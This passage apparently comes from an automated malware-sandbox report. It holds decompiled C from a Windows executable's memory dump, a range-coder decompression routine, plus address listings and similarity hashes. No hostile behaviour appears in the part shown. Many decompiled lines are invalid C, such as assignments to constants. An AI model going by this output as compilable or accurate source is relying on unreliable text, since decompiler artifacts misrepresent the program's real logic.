                              															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                              															__ebx = 1;
                              															__ecx =  *(__ebp - 0x48);
                              															__ebx = 1 << __cl;
                              															__ecx = 1 << __cl;
                              															__ebx =  *(__ebp - 0x44);
                              															__ebx =  *(__ebp - 0x44) | __ecx;
                              															__cx = __ax;
                              															__cx = __ax >> 5;
                              															__eax = __eax - __ecx;
                              															__edi = __edi + 1;
                              															__eflags = __edi;
                              															 *(__ebp - 0x44) = __ebx;
                              															 *__esi = __ax;
                              															 *(__ebp - 0x50) = __edi;
                              														} else {
                              															 *(__ebp - 0x10) = __edx;
                              															0x800 = 0x800 - __ecx;
                              															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                              															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                              															 *__esi = __dx;
                              														}
                              														__eflags =  *(__ebp - 0x10) - 0x1000000;
                              														if( *(__ebp - 0x10) >= 0x1000000) {
                              															L111:
                              															_t368 = __ebp - 0x48;
                              															 *_t368 =  *(__ebp - 0x48) + 1;
                              															__eflags =  *_t368;
                              															goto L112;
                              														} else {
                              															goto L109;
                              														}
                              													}
                              													__ecx =  *(__ebp - 0xc);
                              													__ebx = __ebx + __ebx;
                              													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                              													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                              													 *(__ebp - 0x44) = __ebx;
                              													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                              														__ecx =  *(__ebp - 0x10);
                              														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                              														__ebx = __ebx | 0x00000001;
                              														__eflags = __ebx;
                              														 *(__ebp - 0x44) = __ebx;
                              													}
                              													__eflags =  *(__ebp - 0x10) - 0x1000000;
                              													if( *(__ebp - 0x10) >= 0x1000000) {
                              														L101:
                              														_t338 = __ebp - 0x48;
                              														 *_t338 =  *(__ebp - 0x48) - 1;
                              														__eflags =  *_t338;
                              														goto L102;
                              													} else {
                              														goto L99;
                              													}
                              												}
                              												__edx =  *(__ebp - 4);
                              												__eax = __eax - __ebx;
                              												 *(__ebp - 0x40) = __ecx;
                              												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                              												goto L108;
                              											case 0x1a:
                              												L56:
                              												__eflags =  *(__ebp - 0x64);
                              												if( *(__ebp - 0x64) == 0) {
                              													 *(__ebp - 0x88) = 0x1a;
                              													goto L170;
                              												}
                              												__ecx =  *(__ebp - 0x68);
                              												__al =  *(__ebp - 0x5c);
                              												__edx =  *(__ebp - 8);
                              												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                              												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                              												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                              												 *( *(__ebp - 0x68)) = __al;
                              												__ecx =  *(__ebp - 0x14);
                              												 *(__ecx +  *(__ebp - 8)) = __al;
                              												__eax = __ecx + 1;
                              												__edx = 0;
                              												_t192 = __eax %  *(__ebp - 0x74);
                              												__eax = __eax /  *(__ebp - 0x74);
                              												__edx = _t192;
                              												goto L80;
                              											case 0x1b:
                              												L76:
                              												__eflags =  *(__ebp - 0x64);
                              												if( *(__ebp - 0x64) == 0) {
                              													 *(__ebp - 0x88) = 0x1b;
                              													goto L170;
                              												}
                              												__eax =  *(__ebp - 0x14);
                              												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                              												__eflags = __eax -  *(__ebp - 0x74);
                              												if(__eax >=  *(__ebp - 0x74)) {
                              													__eax = __eax +  *(__ebp - 0x74);
                              													__eflags = __eax;
                              												}
                              												__edx =  *(__ebp - 8);
                              												__cl =  *(__eax + __edx);
                              												__eax =  *(__ebp - 0x14);
                              												 *(__ebp - 0x5c) = __cl;
                              												 *(__eax + __edx) = __cl;
                              												__eax = __eax + 1;
                              												__edx = 0;
                              												_t275 = __eax %  *(__ebp - 0x74);
                              												__eax = __eax /  *(__ebp - 0x74);
                              												__edx = _t275;
                              												__eax =  *(__ebp - 0x68);
                              												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                              												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                              												_t284 = __ebp - 0x64;
                              												 *_t284 =  *(__ebp - 0x64) - 1;
                              												__eflags =  *_t284;
                              												 *( *(__ebp - 0x68)) = __cl;
                              												L80:
                              												 *(__ebp - 0x14) = __edx;
                              												goto L81;
                              											case 0x1c:
                              												while(1) {
                              													L123:
                              													__eflags =  *(__ebp - 0x64);
                              													if( *(__ebp - 0x64) == 0) {
                              														break;
                              													}
                              													__eax =  *(__ebp - 0x14);
                              													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                              													__eflags = __eax -  *(__ebp - 0x74);
                              													if(__eax >=  *(__ebp - 0x74)) {
                              														__eax = __eax +  *(__ebp - 0x74);
                              														__eflags = __eax;
                              													}
                              													__edx =  *(__ebp - 8);
                              													__cl =  *(__eax + __edx);
                              													__eax =  *(__ebp - 0x14);
                              													 *(__ebp - 0x5c) = __cl;
                              													 *(__eax + __edx) = __cl;
                              													__eax = __eax + 1;
                              													__edx = 0;
                              													_t414 = __eax %  *(__ebp - 0x74);
                              													__eax = __eax /  *(__ebp - 0x74);
                              													__edx = _t414;
                              													__eax =  *(__ebp - 0x68);
                              													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                              													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                              													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                              													__eflags =  *(__ebp - 0x30);
                              													 *( *(__ebp - 0x68)) = __cl;
                              													 *(__ebp - 0x14) = _t414;
                              													if( *(__ebp - 0x30) > 0) {
                              														continue;
                              													} else {
                              														L81:
                              														 *(__ebp - 0x88) = 2;
                              														goto L1;
                              													}
                              												}
                              												 *(__ebp - 0x88) = 0x1c;
                              												goto L170;
                              										}
                              									}
                              									L171:
                              									_t535 = _t534 | 0xffffffff;
                              									goto L172;
                              								}
                              							}
                              						}
                              					}
                              					goto L1;
                              				}
                              			}













                              0x00406d88
                              0x00406d8b
                              0x00406dc1
                              0x00406ef1
                              0x00406ef1
                              0x00406ef1
                              0x00406ef1
                              0x00406ef4
                              0x00406ef4
                              0x00406ef7
                              0x00406ef9
                              0x00407183
                              0x00000000
                              0x00407183
                              0x00406eff
                              0x00406f02
                              0x00000000
                              0x00000000
                              0x00406f08
                              0x00406f0c
                              0x00406f0f
                              0x00406f0f
                              0x00406f0f
                              0x00000000
                              0x00406f0f
                              0x00406d8d
                              0x00406d8f
                              0x00406d91
                              0x00406d93
                              0x00406d96
                              0x00406d97
                              0x00406d99
                              0x00406d9b
                              0x00406d9e
                              0x00406da1
                              0x00406db7
                              0x00406dbc
                              0x00406df4
                              0x00406df4
                              0x00406df8
                              0x00406e24
                              0x00406e26
                              0x00406e2d
                              0x00406e30
                              0x00406e33
                              0x00406e33
                              0x00406e38
                              0x00406e38
                              0x00406e3a
                              0x00406e3d
                              0x00406e44
                              0x00406e47
                              0x00406e74
                              0x00406e74
                              0x00406e77
                              0x00406e7a
                              0x00406eee
                              0x00406eee
                              0x00406eee
                              0x00000000
                              0x00406eee
                              0x00406e7c
                              0x00406e82
                              0x00406e85
                              0x00406e88
                              0x00406e8b
                              0x00406e8e
                              0x00406e91
                              0x00406e94
                              0x00406e97
                              0x00406e9a
                              0x00406e9d
                              0x00406eb6
                              0x00406eb8
                              0x00406ebb
                              0x00406ebc
                              0x00406ebf
                              0x00406ec1
                              0x00406ec4
                              0x00406ec6
                              0x00406ec8
                              0x00406ecb
                              0x00406ecd
                              0x00406ed0
                              0x00406ed4
                              0x00406ed6
                              0x00406ed6
                              0x00406ed7
                              0x00406eda
                              0x00406edd
                              0x00406e9f
                              0x00406e9f
                              0x00406ea7
                              0x00406eac
                              0x00406eae
                              0x00406eb1
                              0x00406eb1
                              0x00406ee0
                              0x00406ee7
                              0x00406e71
                              0x00406e71
                              0x00406e71
                              0x00406e71
                              0x00000000
                              0x00406ee9
                              0x00000000
                              0x00406ee9
                              0x00406ee7
                              0x00406dfa
                              0x00406dfd
                              0x00406dff
                              0x00406e02
                              0x00406e05
                              0x00406e08
                              0x00406e0a
                              0x00406e0d
                              0x00406e10
                              0x00406e10
                              0x00406e13
                              0x00406e13
                              0x00406e16
                              0x00406e1d
                              0x00406df1
                              0x00406df1
                              0x00406df1
                              0x00406df1
                              0x00000000
                              0x00406e1f
                              0x00000000
                              0x00406e1f
                              0x00406e1d
                              0x00406da3
                              0x00406da6
                              0x00406da8
                              0x00406dab
                              0x00000000
                              0x00000000
                              0x00406b0a
                              0x00406b0a
                              0x00406b0e
                              0x00407153
                              0x00000000
                              0x00407153
                              0x00406b14
                              0x00406b17
                              0x00406b1a
                              0x00406b1d
                              0x00406b20
                              0x00406b23
                              0x00406b26
                              0x00406b28
                              0x00406b2b
                              0x00406b2e
                              0x00406b31
                              0x00406b33
                              0x00406b33
                              0x00406b33
                              0x00000000
                              0x00000000
                              0x00406c95
                              0x00406c95
                              0x00406c99
                              0x0040715f
                              0x00000000
                              0x0040715f
                              0x00406c9f
                              0x00406ca2
                              0x00406ca5
                              0x00406ca8
                              0x00406caa
                              0x00406caa
                              0x00406caa
                              0x00406cad
                              0x00406cb0
                              0x00406cb3
                              0x00406cb6
                              0x00406cb9
                              0x00406cbc
                              0x00406cbd
                              0x00406cbf
                              0x00406cbf
                              0x00406cbf
                              0x00406cc2
                              0x00406cc5
                              0x00406cc8
                              0x00406ccb
                              0x00406ccb
                              0x00406ccb
                              0x00406cce
                              0x00406cd0
                              0x00406cd0
                              0x00000000
                              0x00000000
                              0x00406f12
                              0x00406f12
                              0x00406f12
                              0x00406f16
                              0x00000000
                              0x00000000
                              0x00406f1c
                              0x00406f1f
                              0x00406f22
                              0x00406f25
                              0x00406f27
                              0x00406f27
                              0x00406f27
                              0x00406f2a
                              0x00406f2d
                              0x00406f30
                              0x00406f33
                              0x00406f36
                              0x00406f39
                              0x00406f3a
                              0x00406f3c
                              0x00406f3c
                              0x00406f3c
                              0x00406f3f
                              0x00406f42
                              0x00406f45
                              0x00406f48
                              0x00406f4b
                              0x00406f4f
                              0x00406f51
                              0x00406f54
                              0x00000000
                              0x00406f56
                              0x00406cd3
                              0x00406cd3
                              0x00000000
                              0x00406cd3
                              0x00406f54
                              0x00407189
                              0x00000000
                              0x00000000
                              0x004067b8
                              0x004071c0
                              0x004071c0
                              0x00000000
                              0x004071c0
                              0x0040700d
                              0x00406f94
                              0x00406f91
                              0x00000000
                              0x00406ce6

                              Memory Dump Source
                              • Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1e7a7db026ec9aad88acaa11386c02789d7bc6b83e00ba9479abd6ecc9ecffba
                              • Instruction ID: a9aff89c954bf491ffe4c30e494efe667c8bfb024e4a61e14b5544386b4e6ab4
                              • Opcode Fuzzy Hash: 1e7a7db026ec9aad88acaa11386c02789d7bc6b83e00ba9479abd6ecc9ecffba
                              • Instruction Fuzzy Hash: 47713471D04229CBDF28CF98C844BADBBB1FF48305F15806AD856BB281C7786996DF45
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 98%
                              			E00406C2E() {
                              				unsigned short _t531;
                              				signed int _t532;
                              				void _t533;
                              				signed int _t534;
                              				signed int _t535;
                              				signed int _t565;
                              				signed int _t568;
                              				signed int _t589;
                              				signed int* _t606;
                              				void* _t613;
                              
                              				L0:
                              				while(1) {
                              					L0:
                              					if( *(_t613 - 0x40) != 0) {
                              						 *(_t613 - 0x84) = 0xa;
                              						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
                              					} else {
                              						 *(__ebp - 0x84) = 9;
                              						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                              					}
                              					while(1) {
                              						 *(_t613 - 0x54) = _t606;
                              						while(1) {
                              							L133:
                              							_t531 =  *_t606;
                              							_t589 = _t531 & 0x0000ffff;
                              							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                              							if( *(_t613 - 0xc) >= _t565) {
                              								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                              								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                              								 *(_t613 - 0x40) = 1;
                              								_t532 = _t531 - (_t531 >> 5);
                              								 *_t606 = _t532;
                              							} else {
                              								 *(_t613 - 0x10) = _t565;
                              								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                              								 *_t606 = (0x800 - _t589 >> 5) + _t531;
                              							}
                              							if( *(_t613 - 0x10) >= 0x1000000) {
                              								goto L139;
                              							}
                              							L137:
                              							if( *(_t613 - 0x6c) == 0) {
                              								 *(_t613 - 0x88) = 5;
                              								L170:
                              								_t568 = 0x22;
                              								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                              								_t535 = 0;
                              								L172:
                              								return _t535;
                              							}
                              							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                              							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                              							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                              							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                              							L139:
                              							_t533 =  *(_t613 - 0x84);
                              							while(1) {
                              								 *(_t613 - 0x88) = _t533;
                              								while(1) {
                              									L1:
                              									_t534 =  *(_t613 - 0x88);
                              									if(_t534 > 0x1c) {
                              										break;
                              									}
                              									switch( *((intOrPtr*)(_t534 * 4 +  &M004071C8))) {
                              										case 0:
                              											if( *(_t613 - 0x6c) == 0) {
                              												goto L170;
                              											}
                              											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                              											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                              											_t534 =  *( *(_t613 - 0x70));
                              											if(_t534 > 0xe1) {
                              												goto L171;
                              											}
                              											_t538 = _t534 & 0x000000ff;
                              											_push(0x2d);
                              											asm("cdq");
                              											_pop(_t570);
                              											_push(9);
                              											_pop(_t571);
                              											_t609 = _t538 / _t570;
                              											_t540 = _t538 % _t570 & 0x000000ff;
                              											asm("cdq");
                              											_t604 = _t540 % _t571 & 0x000000ff;
                              											 *(_t613 - 0x3c) = _t604;
                              											 *(_t613 - 0x1c) = (1 << _t609) - 1;
                              											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                              											_t612 = (0x300 << _t604 + _t609) + 0x736;
                              											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                              												L10:
                              												if(_t612 == 0) {
                              													L12:
                              													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                              													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                              													goto L15;
                              												} else {
                              													goto L11;
                              												}
                              												do {
                              													L11:
                              													_t612 = _t612 - 1;
                              													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                              												} while (_t612 != 0);
                              												goto L12;
                              											}
                              											if( *(_t613 - 4) != 0) {
                              												GlobalFree( *(_t613 - 4));
                              											}
                              											_t534 = GlobalAlloc(0x40, 0x600); // executed
                              											 *(_t613 - 4) = _t534;
                              											if(_t534 == 0) {
                              												goto L171;
                              											} else {
                              												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                              												goto L10;
                              											}
                              										case 1:
                              											L13:
                              											__eflags =  *(_t613 - 0x6c);
                              											if( *(_t613 - 0x6c) == 0) {
                              												 *(_t613 - 0x88) = 1;
                              												goto L170;
                              											}
                              											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                              											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                              											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                              											_t45 = _t613 - 0x48;
                              											 *_t45 =  *(_t613 - 0x48) + 1;
                              											__eflags =  *_t45;
                              											L15:
                              											if( *(_t613 - 0x48) < 4) {
                              												goto L13;
                              											}
                              											_t546 =  *(_t613 - 0x40);
                              											if(_t546 ==  *(_t613 - 0x74)) {
                              												L20:
                              												 *(_t613 - 0x48) = 5;
                              												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                              												goto L23;
                              											}
                              											 *(_t613 - 0x74) = _t546;
                              											if( *(_t613 - 8) != 0) {
                              												GlobalFree( *(_t613 - 8));
                              											}
                              											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                              											 *(_t613 - 8) = _t534;
                              											if(_t534 == 0) {
                              												goto L171;
                              											} else {
                              												goto L20;
                              											}
                              										case 2:
                              											L24:
                              											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                              											 *(_t613 - 0x84) = 6;
                              											 *(_t613 - 0x4c) = _t553;
                              											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                              											 *(_t613 - 0x54) = _t606;
                              											goto L133;
                              										case 3:
                              											L21:
                              											__eflags =  *(_t613 - 0x6c);
                              											if( *(_t613 - 0x6c) == 0) {
                              												 *(_t613 - 0x88) = 3;
                              												goto L170;
                              											}
                              											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                              											_t67 = _t613 - 0x70;
                              											 *_t67 =  &(( *(_t613 - 0x70))[1]);
                              											__eflags =  *_t67;
                              											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                              											L23:
                              											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                              											if( *(_t613 - 0x48) != 0) {
                              												goto L21;
                              											}
                              											goto L24;
                              										case 4:
                              											L133:
                              											_t531 =  *_t606;
                              											_t589 = _t531 & 0x0000ffff;
                              											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                              											if( *(_t613 - 0xc) >= _t565) {
                              												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                              												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                              												 *(_t613 - 0x40) = 1;
                              												_t532 = _t531 - (_t531 >> 5);
                              												 *_t606 = _t532;
                              											} else {
                              												 *(_t613 - 0x10) = _t565;
                              												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                              												 *_t606 = (0x800 - _t589 >> 5) + _t531;
                              											}
                              											if( *(_t613 - 0x10) >= 0x1000000) {
                              												goto L139;
                              											}
                              										case 5:
                              											goto L137;
                              										case 6:
                              											__edx = 0;
                              											__eflags =  *(__ebp - 0x40);
                              											if( *(__ebp - 0x40) != 0) {
                              												__eax =  *(__ebp - 4);
                              												__ecx =  *(__ebp - 0x38);
                              												 *(__ebp - 0x34) = 1;
                              												 *(__ebp - 0x84) = 7;
                              												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                              												while(1) {
                              													 *(_t613 - 0x54) = _t606;
                              													goto L133;
                              												}
                              											}
                              											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                              											__esi =  *(__ebp - 0x60);
                              											__cl = 8;
                              											__cl = 8 -  *(__ebp - 0x3c);
                              											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                              											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                              											__ecx =  *(__ebp - 0x3c);
                              											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                              											__ecx =  *(__ebp - 4);
                              											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                              											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                              											__eflags =  *(__ebp - 0x38) - 4;
                              											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                              											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                              											if( *(__ebp - 0x38) >= 4) {
                              												__eflags =  *(__ebp - 0x38) - 0xa;
                              												if( *(__ebp - 0x38) >= 0xa) {
                              													_t98 = __ebp - 0x38;
                              													 *_t98 =  *(__ebp - 0x38) - 6;
                              													__eflags =  *_t98;
                              												} else {
                              													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                              												}
                              											} else {
                              												 *(__ebp - 0x38) = 0;
                              											}
                              											__eflags =  *(__ebp - 0x34) - __edx;
                              											if( *(__ebp - 0x34) == __edx) {
                              												__ebx = 0;
                              												__ebx = 1;
                              												goto L61;
                              											} else {
                              												__eax =  *(__ebp - 0x14);
                              												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                              												__eflags = __eax -  *(__ebp - 0x74);
                              												if(__eax >=  *(__ebp - 0x74)) {
                              													__eax = __eax +  *(__ebp - 0x74);
                              													__eflags = __eax;
                              												}
                              												__ecx =  *(__ebp - 8);
                              												__ebx = 0;
                              												__ebx = 1;
                              												__al =  *((intOrPtr*)(__eax + __ecx));
                              												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                              												goto L41;
                              											}
                              										case 7:
                              											__eflags =  *(__ebp - 0x40) - 1;
                              											if( *(__ebp - 0x40) != 1) {
                              												__eax =  *(__ebp - 0x24);
                              												 *(__ebp - 0x80) = 0x16;
                              												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                              												__eax =  *(__ebp - 0x28);
                              												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                              												__eax =  *(__ebp - 0x2c);
                              												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                              												__eax = 0;
                              												__eflags =  *(__ebp - 0x38) - 7;
                              												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                              												__al = __al & 0x000000fd;
                              												__eax = (__eflags >= 0) - 1 + 0xa;
                              												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                              												__eax =  *(__ebp - 4);
                              												__eax =  *(__ebp - 4) + 0x664;
                              												__eflags = __eax;
                              												 *(__ebp - 0x58) = __eax;
                              												goto L69;
                              											}
                              											__eax =  *(__ebp - 4);
                              											__ecx =  *(__ebp - 0x38);
                              											 *(__ebp - 0x84) = 8;
                              											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                              											while(1) {
                              												 *(_t613 - 0x54) = _t606;
                              												goto L133;
                              											}
                              										case 8:
                              											goto L0;
                              										case 9:
                              											__eflags =  *(__ebp - 0x40);
                              											if( *(__ebp - 0x40) != 0) {
                              												goto L89;
                              											}
                              											__eflags =  *(__ebp - 0x60);
                              											if( *(__ebp - 0x60) == 0) {
                              												goto L171;
                              											}
                              											__eax = 0;
                              											__eflags =  *(__ebp - 0x38) - 7;
                              											_t258 =  *(__ebp - 0x38) - 7 >= 0;
                              											__eflags = _t258;
                              											0 | _t258 = _t258 + _t258 + 9;
                              											 *(__ebp - 0x38) = _t258 + _t258 + 9;
                              											goto L75;
                              										case 0xa:
                              											__eflags =  *(__ebp - 0x40);
                              											if( *(__ebp - 0x40) != 0) {
                              												__eax =  *(__ebp - 4);
                              												__ecx =  *(__ebp - 0x38);
                              												 *(__ebp - 0x84) = 0xb;
                              												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                              												while(1) {
                              													 *(_t613 - 0x54) = _t606;
                              													goto L133;
                              												}
                              											}
                              											__eax =  *(__ebp - 0x28);
                              											goto L88;
                              										case 0xb:
                              											__eflags =  *(__ebp - 0x40);
                              											if( *(__ebp - 0x40) != 0) {
                              												__ecx =  *(__ebp - 0x24);
                              												__eax =  *(__ebp - 0x20);
                              												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                              											} else {
                              												__eax =  *(__ebp - 0x24);
                              											}
                              											__ecx =  *(__ebp - 0x28);
                              											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                              											L88:
                              											__ecx =  *(__ebp - 0x2c);
                              											 *(__ebp - 0x2c) = __eax;
                              											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                              											L89:
                              											__eax =  *(__ebp - 4);
                              											 *(__ebp - 0x80) = 0x15;
                              											__eax =  *(__ebp - 4) + 0xa68;
                              											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                              											goto L69;
                              										case 0xc:
                              											L99:
                              											__eflags =  *(__ebp - 0x6c);
                              											if( *(__ebp - 0x6c) == 0) {
                              												 *(__ebp - 0x88) = 0xc;
                              												goto L170;
                              											}
                              											__ecx =  *(__ebp - 0x70);
                              											__eax =  *(__ebp - 0xc);
                              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                              											_t334 = __ebp - 0x70;
                              											 *_t334 =  *(__ebp - 0x70) + 1;
                              											__eflags =  *_t334;
                              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                              											__eax =  *(__ebp - 0x2c);
                              											goto L101;
                              										case 0xd:
                              											L37:
                              											__eflags =  *(__ebp - 0x6c);
                              											if( *(__ebp - 0x6c) == 0) {
                              												 *(__ebp - 0x88) = 0xd;
                              												goto L170;
                              											}
                              											__ecx =  *(__ebp - 0x70);
                              											__eax =  *(__ebp - 0xc);
                              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                              											_t122 = __ebp - 0x70;
                              											 *_t122 =  *(__ebp - 0x70) + 1;
                              											__eflags =  *_t122;
                              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                              											L39:
                              											__eax =  *(__ebp - 0x40);
                              											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                              											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                              												goto L48;
                              											}
                              											__eflags = __ebx - 0x100;
                              											if(__ebx >= 0x100) {
                              												goto L54;
                              											}
                              											L41:
                              											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                              											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                              											__ecx =  *(__ebp - 0x58);
                              											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                              											 *(__ebp - 0x48) = __eax;
                              											__eax = __eax + 1;
                              											__eax = __eax << 8;
                              											__eax = __eax + __ebx;
                              											__esi =  *(__ebp - 0x58) + __eax * 2;
                              											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                              											__ax =  *__esi;
                              											 *(__ebp - 0x54) = __esi;
                              											__edx = __ax & 0x0000ffff;
                              											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                              											__eflags =  *(__ebp - 0xc) - __ecx;
                              											if( *(__ebp - 0xc) >= __ecx) {
                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                              												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                              												__cx = __ax;
                              												 *(__ebp - 0x40) = 1;
                              												__cx = __ax >> 5;
                              												__eflags = __eax;
                              												__ebx = __ebx + __ebx + 1;
                              												 *__esi = __ax;
                              											} else {
                              												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                              												 *(__ebp - 0x10) = __ecx;
                              												0x800 = 0x800 - __edx;
                              												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
